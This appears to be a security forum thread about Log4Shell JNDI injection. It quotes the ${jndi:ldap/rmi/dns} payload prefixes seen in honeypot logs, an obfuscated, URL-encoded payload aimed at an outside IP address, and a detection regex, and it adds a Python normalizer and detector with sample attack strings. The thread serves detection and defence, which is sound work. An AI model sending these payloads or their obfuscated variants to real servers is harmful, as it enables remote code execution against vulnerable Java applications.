
${jndi:ldap://

${jndi:rmi://

${jndi:dns://

Any other protocol being actively used that I am missing? At least, only seeing those 3 on our honeypot logs:

reputation.noc.org/jndi-attack

Also some interesting obfuscation, I am assuming to bypass WAF and IDSs:

/?id=%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2F45.83.64.1%2F

@dcid On your last bit, I've got fairly good info that every possible permutation of that is coverable by the big three cloud providers at the L7 level, and that they're all exchanging test suites and prepping autoblocks already.

@dcid This regex should cover all the permutations:

\${(\${(.*?:|.*?:.*?:-)('|"|`)*(?1)}*|[jndi:lapsrm]('|"|`)*}*){9,11}
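An added example, not part of any post in this thread and not noc.org's code: instead of enumerating permutations in a single regex, a detector can undo the URL encoding, collapse nested lookups such as the `${::-j}` in the honeypot line above, and then match the three protocols. The `${lower:...}`/`${upper:...}` handling goes beyond what the thread shows; the function names and the `example.invalid` sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

INNER = re.compile(r"\$\{([^{}]*)\}")  # innermost ${...} with no nested braces
JNDI = re.compile(r"\$\{jndi:(ldap|rmi|dns)://", re.IGNORECASE)

def _resolve(m):
    """Replace one innermost lookup with the text it would evaluate to."""
    body = m.group(1)
    low = body.lower()
    if low.startswith("jndi:"):
        return m.group(0)              # keep the jndi lookup so it can be matched
    if low.startswith("lower:"):
        return body[6:].lower()
    if low.startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:
        return body.split(":-", 1)[1]  # ${anything:-x} falls back to default x
    return m.group(0)                  # unknown lookup: leave untouched

def normalize(text, max_rounds=10):
    """URL-decode (bounded, handles double encoding), then collapse lookups."""
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):        # bounded so hostile nesting cannot spin
        collapsed = INNER.sub(_resolve, text)
        if collapsed == text:
            break
        text = collapsed
    return text

def detect(line):
    """Return 'ldap', 'rmi' or 'dns' if a JNDI lookup is present, else None."""
    m = JNDI.search(normalize(line))
    return m.group(1).lower() if m else None

SAMPLES = [
    "/?id=%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2F45.83.64.1%2F",  # from the thread
    "${jndi:ldap://example.invalid/a}",                # constructed
    "${${lower:J}ndi:${::-r}mi://example.invalid/a}",  # constructed
    "/?id=42&q=${price}",                              # constructed, benign
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(detect(s), s)
```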

Noc.Social

Open Source Social Network. Focused on technology, networking, linux, privacy and security, but open to anyone. Civil discourse, polite and open. Managed by the noc.org team.